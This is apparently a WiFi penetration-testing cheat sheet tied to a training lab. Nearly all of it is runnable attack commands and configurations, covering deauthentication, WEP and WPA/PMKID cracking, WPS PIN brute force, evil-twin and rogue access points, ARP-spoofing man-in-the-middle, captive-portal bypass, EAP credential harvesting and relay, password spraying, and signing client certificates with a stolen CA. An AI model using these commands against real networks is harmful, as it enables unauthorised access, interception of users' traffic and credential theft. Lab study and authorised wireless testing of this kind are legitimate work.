Managing interfaces

Interface status

iw dev
iw wlan0 link

Up/Down Interfaces

ip link set dev wlan0 up/down

Configure interface on specific channel

iwconfig wlan0mon channel 1

Scan wifi networks

iw dev wlan0 scan
iw wlan0 scan

Connect to a wifi network

wpa_supplicant

network={
    ssid="SSID_NAME"
    key_mgmt=NONE
    scan_ssid=1
}

wpa_supplicant -i wlan1 -c wpa_supplicant.conf 

nmcli

nmcli dev wifi connect SSID_NAME password PASSWORD

Obtain IP

dhclient wlan0 -v

Monitor mode

sudo airmon-ng check kill # kill processes that may interfere with airmon-ng
sudo airmon-ng start wlan0
sudo airmon-ng stop wlan0mon

Change MAC

sudo macchanger -r wlan0 # Changes the MAC to a random one
sudo macchanger -m 00:11:22:33:44:55 wlan0

Offensive WiFi Recon

Wifi Packet Dump

sudo airodump-ng --band bag -w [outputfile] --gpsd wlan0mon
# --band bag ==> list all networks operating in 2.4 and 5 GHz
# --gpsd  ==> Record GPS cordinates
# -c ==> channel
# --bssid 
# -w ==> output toa file
# airodump-ng hot keys
=====================
s ==> sort. press multiple times to sort based on different things
TAB ==> enter selection mode
m ==> after selecting an AP, coloring 
Space ==> pause screen output

Wifi Packet Analysis

python3 wifi_db.py -d database.db /airodump_output_dir/
# -d ==> sqlite file to import analyzed database
 
sqlitebrowser -d database.db # view the generated db

Hidden Networks

Listing hidden networks

sudo iwlist wlan0 scan
 
sudo airodump-ng wlan0mon 
# some hidden networks will show the length of their ESSID, and we can abuse that info to bruteforce it

Obtaining hidden ESSID

1. Bruteforce ESSID

mdk4 wlan0mon p -t [BSSID] -f [ESSID-DIC] 
# p ==> is for guessing and auditing hidden networks
# -t ==> MAC of the target network
# -f ==> wordlist 

2. Client Reconnect

• Access points may reveal their names while connecting/reconnecting with clients, so we can either wait for a client to reconnect to that hiddne network, or we can force that by performing a Deauth attack

Wifi Attacks

General

Packet Capture

sudo airodump-ng --band ag -w [outputfile] --gpsd wlan0mon
sudo airodump-ng -c [channel] -w [outputfile] wlan0mon # focus on specific channel

Packet Injection

• Test if the device supports packet Injection

sudo aireplay-ng --test wlan0

• ARP injection attack

sudo aireplay-ng -3 -b [target_BSSID] -h [your_MAC] wlan0 # -3 aireplay-ng attack mode (arpreplay attack) 

OPN Networks

Bypassing captive portals

MAC spoofing

Use one of the following methods

sudo ifconfig wlan0 down
sudo ip link set dev <INTERFACE> address <NEW_MAC_ADDRESS>

Or

ip link set wlan2 down
macchanger -m <CLIENT_MAC> <INTERFACE>
ip link set wlan2 up

Now, connect with wpa_supplicant

IP spoofing

1. Enable ip forwarding

echo 1 > /proc/sys/net/ipv4/ip_forward

2. MITM attack by ARP spoofing

ettercap -T -q -i wlan0 -w dump -M ARP /<AUTHORIZED_CLIENT_IP>/ /<GATEWAY_IP>/

3. Spoof authenticated IP

iptables -t nat -A OUTPUT -d ! <LAN> -j SNAT --to <AUTHORIZED_CLIENT_IP>

4. Increase TTL by 1 to avoide detection

iptables -t mangle -A FORWARD -d <AUTHORIZED_CLIENT_IP> -j TTL --ttl-inc 1

Credentials Theft

If the captive portal doesn't use TLS, we can view the credentials in clear text by sniffing the traffic

• Sniff traffic

 sudo airodump-ng <INTERFACE_MON> -w ~/wifi/scan --manufacturer --wps -c <CHANNEL>

• Filter the HTTP traffic using wiresharek

DNS Tunnel bypass

Since DNS requests are generally allowed even on networks with captive portals, this protocol can be used to create a communication channel that bypasses portal restrictions.

Captive portal webtest

Try to find a vulnerability in the captive portal itself to bypass the login

Evil Twin

1. Create a hostapd config file

interface=wlan0
ssid=FakeOpenNetwork
channel=6

2. Configure DHCP server with dnsmasq by modifying /etc/dnsmasq.conf

interface=wlan0
dhcp-range=192.168.1.50,192.168.1.150,12h

3. We can also configure dnsmasq to redirect dns queries of the victims to an actual fake dns server so we can redirect them to fake attacker controlled websites

address=/example.com/192.168.1.100

View unencrypted traffic

• Using tcpdump and wireshark or with airodump-ng

tcpdump -i wlan0 -w capture.pcap
 
wireshark capture.pcap

OWE

Opportunistic wireless encryption, was introduced with WPA3 to prpotect OPN networks by encrypting the traffic even without using a shared password. can be attacked by:

• Evil Twin Attacks
• Social Engineering: create fake login pages with SET (Social engineering toolkit)

WEP

Wired Equivilent Privacy. was the first attempt to encrypt the wifi communications 1999.

• Capturing and Cracking WEP traffic

Accelerating IV capturing

1. Fake Authentication.

   Sending fake authentication packets to the AP to collect more IVs

   Terminal

   aireplay-ng -1 0 -a <AP MAC> -h <Client MAC> wlan0mon

2. ARP Request Replay Attack (arpreplay)

   Capture valid ARP packets, then repeatedly re-inject them into the network.

   Terminal

   aireplay-ng --arpreplay -b <AP MAC> -h <Fake Client MAC> wlan0mon

3. De Authentication Attacks

mdk4 wlan0 d -B [BSSID]

Dumping traffic

airodump-ng -c channel_num -bssid BSSID -w output-file wlan0mon

Cracking the key through the IVs

aircrack-ng capture.cap -b <AP-MAC> 

Automatic Attack

besside-ng -c 3 -b <AP-MAC> wlan0mon -v

PSK

1. Deauth attack to force clients to do the handshake again
2. Capture handshakes

sudo airodump-ng wlan0mon -c <channel> -w ~/wifi/capture

3. Cracking against a dictionary

# Cracking with aircrack-ng
sudo aircrack-ng -w /path/to/dictionary.txt capture-01.cap
 
# Cracking with hashcat
hcxpcapngtool aux.pcap -o hash.22000 # export pcap file to hashcat mode 22000
sudo hashcat -a 0 -m 22000 hash.22000 ~/rockyou.txt --force # Cracking with hashcat

PMKID vulnerability

The clientless attack

sudo hcxdumptool -i wlan0mon -W capture.pcapng # capture the PMKID 
aircrack-ng capture.cap # analyze the cap file to check if it has a PMKID or not 
sudo hcxpcapngtool -o capture.22000 capture.pcapng # convert it to a hashcat format
sudo hashcat -m 22000 -a 0 capture.22000 /path/to/dictionary.txt # crack

NoAP

Also known as half-handshake attack. So if the attack only requires the first 2 messages from the handshake. and only the second message (sent by the client) is the one needed as its the one encrypted with the key. Why do we need the AP for ? Lets start our own AP based on clients probs

1. Prepare hostapd.conf

interface=$INTERFACE
driver=nl80211
hw_mode=g
channel=1
ssid=$ESSID
mana_wpaout=hostapd.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678

2. Start the fake AP

hostapd hostapd.conf

3. Dump and Crack Don't forget to use airodump-ng on the bssid of our fake AP

WPS PIN

sudo wash -i wlan0mon 
airodump-ng --wps # Identify networks with WPS enabled
sudo reaver -i wlan0mon -b <BSSID> -vv # obtain the WPS pin and PSK key

KRACK attack

Key Reinstallation Attack. Will be added

FRAGAttack

Fragmentation and Aggregation attacks Will be added

Evil Twin Attack

1. Configure hostapd for fake AP

interface=$INTERFACE
driver=nl80211
ssid=$SSID
hw_mode=g
channel=$CHANNEL
auth_algs=1
wpa=3
wpa_passphrase=$WPA_PASSPHRASE
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP

2. dnsmasq for DHCP and DNS servers

interface=$INTERFACE
dhcp-range=192.168.2.2,192.168.2.100,12h
dhcp-option=3,192.168.2.1
dhcp-option=6,192.168.2.1
server=8.8.8.8
log-queries
log-dhcp

3. Start dnsmasq

sudo dnsmasq -C dnsmasq.conf

4. Redirect victims traffic to the internet using iptables

sudo iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
sudo iptables --append FORWARD --in-interface $INTERFACE -j ACCEPT

5. Enable packet forwarding on linux

sudo sysctl -w net.ipv4.ip_forward=1

6. MITM Attack

sudo ettercap -T -q -i $INTERFACE

6. Start hostapd

sudo hostapd hostapd.conf

Traffic Decryption

airdecap-ng -e $ESSID -p $PASSWORD ~/wifi/scanc6-01.cap

Custom Dictionaries

mp64 'password?d?d' > variations.txt # maskprocessor from hashcat-utils . customize masks for uppercase (?u), lowercase (?l), digits (?d), and special characters (?s).
crunch min_length max_length -t password@@@@ > crunch_variations.txt # Customize patterns with @ (letters), % (numbers), ^ (special characters).
john --wordlist=base_words.txt --rules --stdout > wordlist_variations.txt
cewl -d 2 -m 5 -w docswords.txt 

SAE

(Simultaneous Authentication of Equals)

WPA2 Downgrade Attack

1. Make sure that client and AP are not using MFP (Mnanagement Frame Protection). If using it, Deauth attacks won't be possible (using wifi_db or wireshark)
2. Perform Deauthentication Attack
3. Perform a NoAP Attack

Online Bruteforce

./wacker.py --wordlist $DICCIONARIO --ssid $ESSID --bssid $BSSID --interface $INTERFACE --freq $FRECUENCIA_CANAL
# U can obtain the frequency from
## Wikipedia
sudo iwlist wlan0 frequency | grep 'Channel 12 :'

    ./wacker.py --wordlist $DICCIONARIO --ssid $ESSID --bssid $BSSID --interface $INTERFACE --freq 2462
    # U can obtain the frequency from
    ## Wikipedia
    sudo iwlist wlan0 frequency | grep 'Channel 12 :'

Evil Twin Attacks

Evil Twin with OPN Attacks

MGMT

Recon

Identity Recon

• If anonymous identities were not used, we can collect identities (usernames) using
  Terminal

  airodump-ng wlan0mon -c 11 -w /mgmt/ --wps
• Then analyze the output using
  • wiresharek
    wireshark filter

    eap # will show eap identity response messages
  • tshark
    Terminal

    tshark -r /mgmt/scan-01.cap -Y '(eap && wlan.ra == XX:XX:XX:XX:XX:XX) && (eap.identity)' -T fields -e eap.identity
  • wifi_db
    Terminal

    python3 wifi_db.py -d wifidata.SQLITE /home/user/wifi/ # Generate the sqlitedb from pcap file 
    sqlitebrowser wifidata.SQLITE # view it 

Certificate Analysis

We can extract the server certificate that will be used later for TLS communication from the pcap file using

• pcapfilter
  Terminal

  pcapFilter.sh -f /mgmtt/scan-02.cap -C
• wireshark
  wireshark filter

  (wlan.sa == XX:XX:XX:XX:XX:XX) && (tls.handshake.certificate)
• tshark
  Terminal

  tshark -r /home/user/wifi/scan-02.cap -Y "wlan.bssid == XX:XX:XX:XX:XX:XX && ssl.handshake.type == 11" -V

EAP Authentication Analysis

Check what EAP authentication protocols are supported by target network

EAP_buster.sh ssid 'DOMAIN\User' wlan1

Attacks

Rogue AP

• 2 conditions
  • client uses username:password for authentication
  • client doesn't verify the server certificate with an actual CA.
• Generating a fake certificate
  Terminal

  python3 ./eaphammer --cert-wizard
• Start rogue AP and wait for clients to connect (we can force with a deauth attack, also note that most of MGMT APs operate on channel 44)
  1. If the client usees MSCHAPv2
     • Start eaphammer and collect hashed challenge responses of the clients
       Terminal

       python3 ./eaphammer -i wlan3 --auth wpa-eap --essid $ESSID --creds
     • Crack challenge respnoses
       Terminal

       hashcat -a 0 -m 5500  ~/rockyou.txt --force
  2. If the client uses GTC Same as we did with MSCHAPv2. but we can let eaphammer to use weakest EAP methods first. if happened. we can obtain clear text credentials without the need for Cracking
     Terminal

     python3 ./eaphammer -i wlan3 --auth wpa-eap --essid wifi-corp --creds --negotiate weakest

Relay Attack

1. connect to the real AP. and initiate the challenge handshake processes In this, we will use wpa_sychphant to redirect all traffic from fake AP to the actual one. with a config file. to make sure that it will connect to the actual AP not our fake one

   wpa_sycophant.config

   network={
   ## ssid is the name of the network you want to rely to. you can relay user credentials to other networks too
   ssid="$ESSID"
   ## The SSID you would like to relay and authenticate against. 
   scan_ssid=1
   key_mgmt=WPA-EAP
   ## Do not modify
   identity=""
   anonymous_identity=""
   password=""
   ## This initialises the variables for me.
   ## -------------
   eap=PEAP
   phase1="crypto_binding=0 peaplabel=0"
   ## if auth failed, use:
   ## phase1="eapver=1"
   phase2="auth=MSCHAPV2"
   ## Dont want to connect back to ourselves,
   ## so add your rogue BSSID here.
   bssid_blacklist=$BSSID_AP
   }

   run it

   Terminal

   wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlan3

2. Bring up the fake AP

   Terminal

   berate_ap --eap --mana-wpe --wpa-sycophant --mana-credout outputMana.log wlan1 lo $ESSID

Bruteforce

air-hammer.py -i wlan3 -e $ESSID -p $DICCIONARIO -u username.list

Password Spray

./air-hammer.py -i wlan4 -e wifi-corp -P 12345678 -u usernames.list

RogueAP (captive-portal)

• Create the html captive portal wihtin ./core/wskeyloggerd/templates/user_defined/login/body.html
• Start Roguq AP
  Terminal

  sudo killall dnsmasq
  ./eaphammer --essid WiFi-Restaurant --interface wlan4 --captive-portal

wifiphisher -aI wlan0 -p wifi_connect --handshake-capture handshake.pcap

Abusing stolen CA

Create AP

1. Import the stolen CA key into eaphammer

   Terminal

   python3 ./eaphammer --cert-wizard import --server-cert /path/to/server.crt --ca-cert /path/to/ca.crt --private-key /path/to/server.key --private-key-passwd whatever

2. Spawn the fake AP with the stilen CA certificate

   Terminal

   python3 ./eaphammer -i wlan4 --auth wpa-eap --essid wifi-corp 

3. Perform a deauth attack against the clients

Create client Cert

1. Generate client.key
   Terminal

   openssl genrsa -out client.key 2048
2. Prepare config fiels
   client.conf

   [ req ]
   default_bits       = 2048
   distinguished_name = req_DN
   string_mask        = nombstr
    
   [ req_DN ]
   countryName                     = "1. Country Name             (2 letter code)"
   countryName_default             = ES
   countryName_min                 = 2
   countryName_max                 = 2
   stateOrProvinceName             = "2. State or Province Name   (full name)    "
   stateOrProvinceName_default     = Madrid
   localityName                    = "3. Locality Name            (eg, city)     "
   localityName_default            = Madrid
   0.organizationName              = "4. Organization Name        (eg, company)  "
   0.organizationName_default      = WiFiChallenge Lab
   organizationalUnitName          = "5. Organizational Unit Name (eg, section)  "
   #organizationalUnitName_default  = 
   commonName                      = "6. Common Name              (eg, CA name)  "
   commonName_max                  = 64
   commonName_default              = WiFiChallenge Lab CA
   emailAddress                    = "7. Email Address            (eg, name@FQDN)"
   emailAddress_max                = 40
   emailAddress_default            = client@WiFiChallengeLab.com
   client.ext

   extensions = x509v3
    
   [ x509v3 ]
   nsCertType = client,email,objsign
   keyUsage   = digitalSignature,nonRepudiation,keyEncipherment,dataEncipherment
3. Generate CSR
   Terminal

   openssl req -config client.conf -new -key client.key -out client.csr
4. Sign it with stolen CA
   Terminal

   openssl x509 -days 730 -extfile client.ext -CA ca.crt -CAkey ca.key -CAserial ca.serial -in client.csr -req -out client.crt
   cat client.crt client.key > client.pem.crt